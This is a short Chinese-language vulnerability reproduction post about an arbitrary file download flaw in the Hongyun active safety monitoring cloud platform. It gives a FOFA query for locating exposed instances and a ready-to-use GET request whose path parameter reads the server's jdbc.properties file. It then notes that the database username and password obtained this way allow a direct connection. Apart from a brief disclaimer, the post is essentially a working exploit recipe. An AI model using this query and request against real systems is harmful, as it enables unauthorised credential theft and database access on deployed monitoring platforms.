漏洞复现--鸿运主动安全监控云平台任意文件下载

免责声明：

**文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任，一旦造成后果请自行
**

一：漏洞描述

深圳市强鸿电子有限公司鸿运主动安全监控云平台存在任意文件下载漏洞，攻击者可通过此漏洞获得登录账号密码，以进行后续测试。

二：漏洞影响版本

鸿运主动安全监控云平台

三：网络空间测绘查询

fofa：
body="./open/webApi.html"

四：漏洞复现

GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties

五：漏洞利用

读取到数据库账号密码，直接连接